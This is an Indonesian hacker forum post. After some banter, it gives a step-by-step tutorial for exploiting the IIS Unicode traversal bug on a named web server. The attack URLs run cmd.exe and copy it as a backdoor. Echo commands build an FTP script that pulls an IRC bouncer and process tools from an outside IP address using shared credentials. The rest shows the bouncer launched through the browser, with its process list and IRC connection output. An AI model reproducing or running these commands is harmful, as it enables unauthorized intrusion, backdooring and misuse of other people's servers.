Komunitas Anak Mataram

ngahahahaahahahahaha



gila lu ndro

kancut

huakakakakkakaka
emang begitu tutornya
selamat berjuang kawan

huakakka mundur terus pantang maju

#################################################################################################
## Memasang Bouncher Pada Server IIS (Dengan Unicode Vurlnerable IIS 4.0 win98/NT IIS 5.0 juga##
## bisa yg penting elo bisa upload file ke web server nya ) . ##
#################################################################################################

..:: DISCLAIMER ::..

Tutor ini hanya untuk tujuan mencerdaskan anak bangsa, segala resiko yg terjadi bukan tanggung
jawab penulis. Dan penulis asumsikan saudara udah mengerti benar ttg bug yg dah lama ini
(Unicode), sebenarnya masih bnyak cara lain :) selain memanfaatkan bug Unicode pada server IIS.

..:: TOOLZ ::..

- Pertama-pertama siapkan rokok, makanan yg secukupnya kalo bisa ce cakep huaaa ini pembawa
inspirasi :)
- IIS Scanner ( Untuk mencari Hole Pada Web Server yg mungkin Vulrnerable ), gw biasanya pake
cgi/iis scanner 4.0 - IIS Scanner 2002 by schiczho Thx for tools, IISTESO.C ini juga nice bgt.
- List dari web target paling cepat cari di msn.net keyword " IIS 4.0 Server" hehe disana
gudangnya.
- PSKILL.EXE ( Untuk KILL Proses di OS Windows), PSLIST.EXE (Untuk Proses List yg sedang jalan)
- BNC.EXE dan BNC.CFG sendiri untuk file bouncernya sendiri. File ini bisa didapatkan pada
server ftp yg emang gw sengaja upload untuk dipakai bersama. PERHATIAN!!! Bagi tangan jahil
aku harap username dan password pada server ftp yg gw masukin pada tutor ini jangan diganti
biar kita semua bisa pake. :) gw percaya ama kalian semua.

..:: LANGKAH-LANGKAH ::..

- Setelah anda mendapatkan targetnya misalnya "http://www.hefele.sulinet.hu" scan dulu targetnya
untuk mencari unicode yg kira-kira bisa dipakai untuk mengupload file nya.
- Dari hasil scan target tadi saya dapatkan bug berikut :

"http://www.hefele.sulinet.hu/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\"

Tapi untuk memperpendek bug nya atau kata lain kita buat backdoor untuk antisipasi, copiin
file cmd.exe ke folder yg kira bisa dibuka lewat komputer luar. Dari sekian folder yg bisa
diakses ada tiga folder yg benar enak and mantabz bo untuk dipasangin backdoor yakni :

../scripts >+c:\ftp.txt
echo+bncfile>>+c:\ftp.txt
echo+masukaja>>+c:\ftp.txt
echo+bin>>+c:\ftp.txt
echo+cd+bnc>>+c:\ftp.txt
echo+get+bnc.exe>>+c:\ftp.txt
echo+get+PSLIST.EXE>>+c:\ftp.txt
echo+get+PSKILL.EXE>>+c:\ftp.txt
echo+ascii>>+c:\ftp.txt
echo+get+bnc.cfg>>+c:\ftp.txt
echo+bye>>+c:\ftp.txt

Gw anggap semua dah tau cara buat scriptnya dengan command echo, kalo belum au ah gelapzzz...
setelah script nya jadi pastiin dulu isi scriptsnya benar, dengan command type seperti dibawah ini :

"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+type+c:\ftp.txt"

pastiin isi script nya seperti ini

open 209.202.197.150
bncfile
masukaja
bin
cd bnc
get bnc.exe
get PSLIST.EXE
get PSKILL.EXE
ascii
get bnc.cfg
bye

Kalo isi scriptnya udah seperti diatas, kita bisa menjalankan scriptnya dengan command brkt :

"http://www.hefele.sulinet.hu/scripts/ftp.exe?-s:c:\ftp.txt"

Clink... file bnc kita berikut tools nya udah ada di "C:\Inetpub\Scripts\" Kalo gak percaya
liat aja sendiri pake command dir (semuanya command DOS murni kok) gini loh dulz :

"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+dir"

Kalo file nya dah ada, bnc nya cukup kita jalanin lewat browser kayak gini :

"http://www.hefele.sulinet.hu/scripts/bnc.exe"

Biasanya akan keluar keterangan bahwa bnc nya dah aktif, tapi untuk lebih memastikan bahwa
BNC kamu jalan pake tools PSLIST untuk melihat prosesnya :)

"http://www.hefele.sulinet.hu/scripts/PSLIST.EXE"

akan tampil seperti ini :

Process information for SZERVER:

Name Pid Pri Thd Hnd Mem User Time Kernel Time Elapsed Time
Idle 0 0 1 0 16 0:00:00.000 661:34:23.153 0:00:00.000
System 2 8 85 2610 1032 0:00:00.000 0:07:48.313 0:00:00.000
SMSS 25 11 6 30 0 0:00:00.090 0:00:00.070 667:57:32.790
CSRSS 33 13 7 636 1016 0:00:01.682 0:00:01.442 667:57:27.052
..
..
..
VbCons 621 8 18 212 2596 0:00:00.871 0:00:01.131 87:48:53.868
BNC 501 8 1 260 1216 0:00:00.010 0:00:00.010 0:08:56.261
PSLIST 418 8 1 299 1884 0:00:00.040 0:00:00.110 0:00:00.150

Disitu kamu bisa ngeliat BNC kamu aktif dengan nomor PID 501 , jika suatu waktu bncnya
crash kamu bisa kill prosesnya dengan command :

"http://www.hefele.sulinet.hu/scripts/PSKILL.EXE?+501" Server: pass admin
[09:07] -www.hefele.sulinet.hu- Welcome to BNC 2.6.4-WIN, the irc proxy
[09:07] -www.hefele.sulinet.hu- Level two, lets connect to something real now
[09:07] -www.hefele.sulinet.hu- type /quote conn [server] to connect
[09:07] -www.hefele.sulinet.hu- type /quote help for basic list of commands and usage
"/quote conn tiscali.uk.eu.dal.net 8888"
[09:08] -> Server: conn tiscali.uk.eu.dal.net 8888
[09:08] -www.hefele.sulinet.hu- Making reality through tiscali.uk.eu.dal.net port 8888
[09:08] -www.hefele.sulinet.hu- Suceeded connection

Cleng..... elo dah connect ke server irc dengan IP web server yg elo pasangin BNC. :)
Ok deh.. cuman segini kok tutor dudulz ini, kalo yg udah bisa jgn ngolok ya :P ajarin dong
yg lain ilmu jangan disimpan sendiri ntar mabok elo... mabok ilmu emang enak xixixi.

#################################################################################################
## Thx for all crew #SamarindaHack #sysHACK #cr@cker Makasih deh tuk kalian semua ##
## Buat Dudulz disebelah jgn ngolok yaa, Miss U Honey [^_^] ##
## Wasalam...!!!! ##
## |SlackWare| I am not HackerZ but i just NewBiez ##
#################################################################################################